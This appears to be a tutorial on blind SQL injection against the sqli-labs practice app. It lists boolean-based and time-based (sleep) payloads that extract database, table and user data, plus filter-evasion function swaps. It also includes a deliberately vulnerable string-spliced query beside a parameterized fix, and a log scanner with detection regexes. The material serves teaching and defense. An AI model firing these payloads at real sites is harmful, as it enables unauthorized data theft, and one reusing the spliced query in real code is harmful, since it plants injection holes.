SQL Injection: Boolean-Based Blind and Time-Based Blind


Boolean-based blind injection

Guessing the database name
?id=1' and length(database())=8-- -
?id=1' and length(database())>8-- -
First character of the current database name: take the first character and compare it by ASCII code
id=1' and left(database(),1)>'a' -- - 
id=1' and left(database(),1)>'z' -- - 
So the character lies between a and z
id=1' and left(database(),1)>'r' -- -
id=1' and left(database(),1)>'s' -- -
id=1' and left(database(),2)>'sa'-- -

Guessing table names
id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit a,1),b,1))>n
a is the table index (starting from 0), b is the character position, and n is the decimal ASCII code.
substr("abc",1,1)  substring function: start at position 1, take 1 character, returns a
substr("abc",2,1)  start at position 2, take 1 character, returns b
substr("abc",1,2)  start at position 1, take 2 characters, returns ab
substr("abc",0,1)  # positions start at 0 in PHP but at 1 in MySQL, so this returns an empty string in MySQL
First table
ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101
(select table_name from information_schema.tables where table_schema=database() limit 0,1) returns the first table name
substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1) takes its first character
ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101
ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>102
Second table
ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=101

Checking for a user table

/sqlitest/Less-5/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='user' limit 0,1),1,1))>100%23

Dumping the columns
ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=101
ord() can be used in place of ascii(), and mid() in place of substr(), to get around filters on those function names

sqlitest/Less-5/?id=1' and ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))=68-- -

Reference: https://blog.csdn.net/weixin_53324462/article/details/113800035
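The boolean probes above work only because the request parameter is pasted into the SQL text, so the quote in the input closes the literal and the rest is parsed as SQL. The following added example (not code from the original post or from sqli-labs) puts the vulnerable pattern beside the parameterized one. It assumes an in-memory SQLite stand-in for the lab's users table with made-up rows; since SQLite has no database(), the length probe checks the length of the first table name in sqlite_master instead, as an analogue of length(database())=8.

```python
import sqlite3

# Constructed stand-in for the lab's users table (assumption: SQLite in memory, not the
# sqli-labs MySQL schema; the rows are made up).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")])
    return conn


def lookup_unsafe(conn, user_id):
    """Vulnerable pattern: the request parameter is spliced into the SQL text, so a
    quote in the input ends the literal and the remainder is parsed as SQL."""
    sql = "SELECT username FROM users WHERE id = '%s'" % user_id
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def lookup_safe(conn, user_id):
    """Hardened pattern: the parameter is bound through a placeholder; the engine
    compares the whole input as one value and never parses it as SQL."""
    row = conn.execute("SELECT username FROM users WHERE id = ?", (user_id,)).fetchone()
    return row[0] if row else None


# Inputs in the shape of the page's boolean probes. The third one stands in for
# length(database())=8: SQLite has no database(), so it measures the first table
# name from sqlite_master instead (5 is the length of "users").
TRUE_PROBE = "1' and 1=1-- -"
FALSE_PROBE = "1' and 1=2-- -"
LENGTH_PROBE = "1' and length((select name from sqlite_master where type='table' limit 1))=5-- -"


def compare_handlers():
    """Run the same inputs through both handlers and return what each one answers."""
    conn = make_db()
    results = {}
    for label, value in [("plain", "1"), ("true", TRUE_PROBE),
                         ("false", FALSE_PROBE), ("length", LENGTH_PROBE)]:
        results[label] = {
            "unsafe": lookup_unsafe(conn, value),
            "safe": lookup_safe(conn, value),
        }
    return results


if __name__ == "__main__":
    for label, answers in compare_handlers().items():
        print(f"{label:>6}: unsafe={answers['unsafe']!r:12} safe={answers['safe']!r}")
```

With string splicing, the true/false probes give two distinguishable answers (a row or no row), which is exactly the oracle the page relies on; with a bound parameter, every probe is compared as the literal text and returns nothing, while the plain id still works.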

Time-based blind injection

sleep(X) delays the response by X seconds
?id=1' and sleep(5)-- -
if(condition, x, y) returns x if the condition is true, otherwise y
?id=1' and if(1=1,1,sleep(1))    returns 1 (no delay)
?id=1' and if(1=2,1,sleep(1))    responds after a 1-second delay

?id=1' and if(length(database())>8,sleep(2),0)
?id=1' and if(length(database())>=8,sleep(5),1)-- -
Determining the database name
?id=1' and if(ascii(substr(database(),1,1))=115,sleep(2),0) --+
?id=1' and if(ascii(substr(database(),1,1))>95,sleep(6),1)-- -
Determining table names
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit x,y),z,d))=e,sleep(1),0)-- -   (x,y: LIMIT offset and count; z,d: substr start and length; e: ASCII code to test)
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100,sleep(2),1)-- -
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100,sleep(5),1)-- -
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1))=109,sleep(3),0)--+

Reference: https://blog.csdn.net/qq_51954912/article/details/116100446
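On the defensive side, every probe in both sections leaves a recognisable footprint in the web server log: a quote followed by and/or, length(database()), ascii(substr(...)) or ord(mid(...)), information_schema, sleep() or benchmark(), and a comment tail. The added example below (my own code, not from the original post) decodes the query string of each access-log line and classifies matches as boolean-based or time-based; when the log carries the request duration, a matched sleep() request that really took seconds is flagged as slow, which tells a delivered delay apart from a mere attempt. The log lines are constructed for the example and the trailing request-time field is an assumed nginx-style $request_time in seconds.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample log (not from any real server): nginx-style combined format with
# $request_time in seconds appended as the last field. Lines 2-4 carry probes in the
# shape shown on the page; lines 1 and 5 are ordinary requests.
SAMPLE_LOG = """\
10.0.0.5 - - [12/May/2024:10:01:02 +0000] "GET /sqlitest/Less-5/?id=1 HTTP/1.1" 200 742 0.004
10.0.0.5 - - [12/May/2024:10:01:03 +0000] "GET /sqlitest/Less-5/?id=1%27%20and%20length(database())%3D8--%20- HTTP/1.1" 200 742 0.005
10.0.0.5 - - [12/May/2024:10:01:04 +0000] "GET /sqlitest/Less-5/?id=1%27%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema%3Ddatabase()%20limit%200,1),1,1))%3E100%23 HTTP/1.1" 200 742 0.006
10.0.0.5 - - [12/May/2024:10:01:05 +0000] "GET /sqlitest/Less-5/?id=1%27%20and%20if(length(database())%3E%3D8,sleep(5),1)--%20- HTTP/1.1" 200 742 5.012
10.0.0.9 - - [12/May/2024:10:01:06 +0000] "GET /sqlitest/Less-5/?id=2 HTTP/1.1" 200 751 0.004
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<bytes>\d+) (?P<rt>[\d.]+)$'
)

# Each indicator is the textual footprint of one building block of the page's probes,
# checked against the URL-decoded parameter value (case-insensitive).
INDICATORS = {
    "quote_then_boolean": re.compile(r"'\s*(?:and|or)\b", re.I),
    "length_of_database": re.compile(r"\blength\s*\(\s*database\s*\(", re.I),
    "left_of_database": re.compile(r"\bleft\s*\(\s*database\s*\(", re.I),
    "char_inference": re.compile(r"\b(?:ascii|ord)\s*\(\s*(?:substr|substring|mid|left)\s*\(", re.I),
    "information_schema": re.compile(r"\binformation_schema\.", re.I),
    "time_function": re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I),
    "comment_tail": re.compile(r"(?:--[\s-]*|#)$"),
}
TIME_BASED = {"time_function"}
BOOLEAN_BASED = {"length_of_database", "left_of_database", "char_inference"}


def decoded_params(target):
    """Yield (name, decoded value) for each query-string pair of a request target."""
    for pair in urlsplit(target).query.split("&"):
        if not pair:
            continue
        name, _, raw = pair.partition("=")
        yield name, unquote_plus(raw)


def scan_log(text, slow_threshold=2.0):
    """Return one finding per request parameter that carries blind-SQLi indicators.
    A finding is 'slow' when the request also took at least slow_threshold seconds,
    the combination that separates a delivered sleep() from a harmless slow page."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        for name, value in decoded_params(m["target"]):
            hits = [key for key, rx in INDICATORS.items() if rx.search(value)]
            if not hits:
                continue
            if TIME_BASED & set(hits):
                kind = "time-based blind"
            elif BOOLEAN_BASED & set(hits):
                kind = "boolean-based blind"
            else:
                kind = "sql-injection probe"
            findings.append({
                "ip": m["ip"], "time": m["ts"], "param": name, "value": value,
                "indicators": hits, "kind": kind,
                "slow": float(m["rt"]) >= slow_threshold,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['kind']:<20} slow={f['slow']!s:<5} {f['param']}={f['value']}")
```

Decoding before matching matters: the page's payloads arrive as %27, %20, %3D and %23, and --+ only becomes "-- " after plus-decoding, so a pattern applied to the raw request line would miss most of them. Set slow_threshold to something just below the smallest sleep() value you expect to see in practice.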